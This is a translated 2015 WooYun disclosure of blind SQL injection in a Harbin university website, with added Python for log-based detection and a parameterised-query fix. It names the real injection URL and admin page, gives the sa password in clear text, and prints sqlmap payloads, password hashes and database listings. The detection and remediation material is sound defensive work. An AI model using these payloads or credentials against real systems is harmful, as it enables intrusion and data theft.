
Vulnerability summary

Defect ID: wooyun-2015-0109981

Title: boolean-based blind SQL injection at a university in Harbin

Affected vendor: a university in Harbin

Author: 蜗牛的贝壳

Submitted: 2015-05-04 18:00

Fix deadline: 2015-05-09 18:00

Published: 2015-05-09 18:00

Vulnerability type: SQL injection

Severity: medium

Self-assessed Rank: 10

Status: handed over to a third-party partner organisation (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-05-04: details sent to the vendor, awaiting the vendor's response
2015-05-09: the vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

The SQL injection vulnerability allows information disclosure. In addition, the account the site uses to connect to the database is sa with the password sa1234, and the admin login page is at: http://kjxy.hrbcu.edu.cn/admin/M_UserLogin.aspx

Detailed description:

Injection point: http://kjxy.hrbcu.edu.cn/NewsListaspx.aspx?from=top&level=top&type=txt&Cid=5 The Cid parameter is not strictly filtered, which allows SQL injection; multiple databases can be dumped and sensitive information leaked.

Proof of vulnerability:

sqlmap identified the following injection points with a total of 152 HTTP(s) requests:
---
Parameter: Cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: from=top&level=top&type=txt&Cid=5 AND 3665=3665
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: from=top&level=top&type=txt&Cid=5;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] KJXY
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SysSchool
[*] tempdb
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01005daebcd6079a453cc201c8f5fe6569f09020a1e8ef5d8fe9
header: 0x0100
salt: 5daebcd6
mixedcase: 079a453cc201c8f5fe6569f09020a1e8ef5d8fe9
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x0100c2cad526792072ae105d5337c04b1296fd9b2bd728367ea3
header: 0x0100
salt: c2cad526
mixedcase: 792072ae105d5337c04b1296fd9b2bd728367ea3
[*] sa [1]:
password hash: 0x0100b05eda5d9bb0d02ac98088d75d4734f7154ff81fbcd4fa00
header: 0x0100
salt: b05eda5d
mixedcase: 9bb0d02ac98088d75d4734f7154ff81fbcd4fa00
clear-text password: sa1234
Database: SysSchool
[49 tables]
+-------------------+
| ActiveProject |
| AdminMenu |
| Class |
| Cmessage |
| Company |
| D99_CMD |
| D99_Tmp |
| EmailAttachment |
| FeildItem |
| GovConsist |
| Links |
| NWEmailAttachment |
| NewsCategory |
| PicNews |
| PicType |
| RoleCategory |
| StINFO |
| Staff |
| SysEmailBox |
| SysLog |
| SysNWEmailBox |
| SysProvince |
| SysRole |
| SysTeacherJCXXB |
| SysTeacherJXXXB |
| SysTeacherKYXXB |
| SysTeacherRCXXB |
| SysTeachersInfo |
| SystemMenu |
| TextNews |
| UserFiles |
| UserInfo |
| Users |
| View_AllNewsInfo |
| View_CPNR |
| View_CPTitle |
| View_UserInfo |
| WebStiestyle |
| ZIPCODE |
| adminUser |
| sysCPXXSET |
| sysDictionary |
| sysEmailConfig |
| sysInfoNews |
| sysPCXXB |
| sysStudentsInfo |
| sysXXLX |
| sysdiagrams |
| zidian |
+-------------------+
Database: KJXY
[24 tables]
+------------------+
| Admin |
| AdminMenu |
| Admin_forum |
| Article_E |
| Article_NoCheck |
| Board |
| Class |
| Config |
| NClass |
| NotDown |
| Remark |
| Remark_comments |
| Special |
| T_GJXX |
| Template_List |
| article_comments |
| downloadclass |
| downloads |
| photoclass |
| photos |
| pictures |
| settings |
| templates |
| usertype |
+------------------+
And so on... the network was too slow, so I did not dig any further.
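The sqlmap output above identifies two probe shapes against the Cid parameter: a numeric tautology appended with AND (the boolean-based blind check) and a statement terminator followed by WAITFOR DELAY (the SQL Server stacked-query check). Both leave a recognisable trace in the web server's access log. The following script is an added example, not part of the original report, that scans constructed IIS W3C-format log lines for those two shapes and for the sqlmap user agent; the log excerpt, IP addresses and timestamps are made up for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log excerpt (sample data, not taken from the report).
# Client IPs, timestamps and user agents are made up; the query strings reproduce
# the shape of the two payloads sqlmap reported against Cid.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2015-05-04 10:01:02 10.0.0.5 GET /NewsListaspx.aspx from=top&level=top&type=txt&Cid=5 80 - 198.51.100.7 Mozilla/5.0 200
2015-05-04 10:01:03 10.0.0.5 GET /NewsListaspx.aspx from=top&level=top&type=txt&Cid=5%20AND%203665=3665 80 - 198.51.100.7 sqlmap/1.0 200
2015-05-04 10:01:04 10.0.0.5 GET /NewsListaspx.aspx from=top&level=top&type=txt&Cid=5;WAITFOR%20DELAY%20%270:0:5%27-- 80 - 198.51.100.7 sqlmap/1.0 200
2015-05-04 10:01:05 10.0.0.5 GET /NewsListaspx.aspx from=top&level=top&type=txt&Cid=7 80 - 203.0.113.9 Mozilla/5.0 200
"""

# "AND 3665=3665"-style numeric tautology: the boolean-based blind probe.
BOOLEAN_TAUTOLOGY = re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.IGNORECASE)
# Statement terminator followed by WAITFOR DELAY: the MSSQL stacked-query probe.
STACKED_WAITFOR = re.compile(r";\s*WAITFOR\s+DELAY\s+'", re.IGNORECASE)


def classify_query(raw_query):
    """Return a list of findings for one cs-uri-query value ("-" when empty)."""
    findings = []
    if raw_query == "-":
        return findings
    # Split pairs by hand rather than with urllib.parse.parse_qs: older parse_qs
    # versions also split on ';', which would hide the stacked-query payload.
    for pair in raw_query.split("&"):
        name, _, value = pair.partition("=")
        value = unquote_plus(value)  # IIS logs the query as received, still encoded
        if BOOLEAN_TAUTOLOGY.search(value):
            findings.append(f"{name}: boolean-based tautology")
        if STACKED_WAITFOR.search(value):
            findings.append(f"{name}: stacked WAITFOR DELAY")
    return findings


def scan_log(text):
    """Parse a W3C log and return one alert dict per suspicious request."""
    fields = None
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names from the directive line
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        cols = line.split()
        if len(cols) != len(fields):
            continue  # malformed or truncated line: skip rather than crash
        rec = dict(zip(fields, cols))
        findings = classify_query(rec.get("cs-uri-query", "-"))
        if "sqlmap" in rec.get("cs(User-Agent)", "").lower():
            findings.append("user-agent: sqlmap")
        if findings:
            alerts.append({
                "line": lineno,
                "client": rec.get("c-ip"),
                "uri": rec.get("cs-uri-stem"),
                "findings": findings,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"line {alert['line']} {alert['client']} {alert['uri']}: "
              f"{', '.join(alert['findings'])}")
```

The user-agent check is the weakest of the three signals, since it is trivially changed; the query-string patterns are what matter, and because sqlmap's boolean-based technique sends the true and false variants in pairs, a burst of requests from one client with the same stem and only the comparison digits changing is the practical alert condition.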

Remediation:

Filter the parameters properly. Change the admin login URL, it is far too easy to find. The sa password is too simple, make it more complex. And that account's privileges are very broad too, which is quite dangerous...

Copyright notice: when reposting, please credit the source: 蜗牛的贝壳@乌云
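"Filter the parameters properly" for an integer id such as Cid means two things: reject anything that is not an integer, and bind the value as a query parameter so it can never become SQL text. The following is an added example, not code from the affected site, using Python's sqlite3 module as a stand-in for the ASP.NET/SQL Server stack; the table and rows are constructed. The same pattern in ADO.NET is int.TryParse on the request value followed by a SqlParameter of type SqlDbType.Int on the SqlCommand.

```python
import sqlite3


def build_demo_db():
    """In-memory stand-in for a news table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE TextNews (Id INTEGER PRIMARY KEY, Cid INTEGER, Title TEXT);
        INSERT INTO TextNews VALUES (1, 5, 'Public notice');
        INSERT INTO TextNews VALUES (2, 6, 'Internal memo');
        INSERT INTO TextNews VALUES (3, 7, 'Exam schedule');
    """)
    return conn


def list_news_vulnerable(conn, cid):
    """The defect described on the page: Cid is pasted into the SQL text unchecked."""
    sql = "SELECT Id, Title FROM TextNews WHERE Cid = " + cid
    return conn.execute(sql).fetchall()


def list_news_fixed(conn, cid):
    """Hardened form: validate the type, then bind the value as a parameter."""
    try:
        cid_int = int(cid)
    except (TypeError, ValueError):
        raise ValueError("Cid must be an integer category id") from None
    # The '?' placeholder is sent to the engine separately from the SQL text,
    # so the value is compared as an integer and never parsed as SQL.
    return conn.execute(
        "SELECT Id, Title FROM TextNews WHERE Cid = ?", (cid_int,)
    ).fetchall()


def fixed_accepts(conn, cid):
    """True if the hardened handler accepts the input, False if it rejects it."""
    try:
        list_news_fixed(conn, cid)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    conn = build_demo_db()
    probe = "5 AND 3665=3665"  # the boolean probe from the sqlmap output above
    print("vulnerable:", list_news_vulnerable(conn, probe))  # probe runs as SQL
    print("fixed accepts probe:", fixed_accepts(conn, probe))  # False
    print("fixed, Cid=5:", list_news_fixed(conn, "5"))
```

Parameter binding alone would already stop the injection; the explicit integer check in front of it is still worth keeping because it turns a malformed request into a clean 400-style rejection instead of a database error, and it documents the parameter's contract. Separately from the code fix, the report's other point stands: the application should connect with a low-privilege database login scoped to its own database rather than sa.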


Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2015-05-09 18:00

Vendor reply:

Vulnerability Rank: 2 (WooYun assessment)

Latest status:

None yet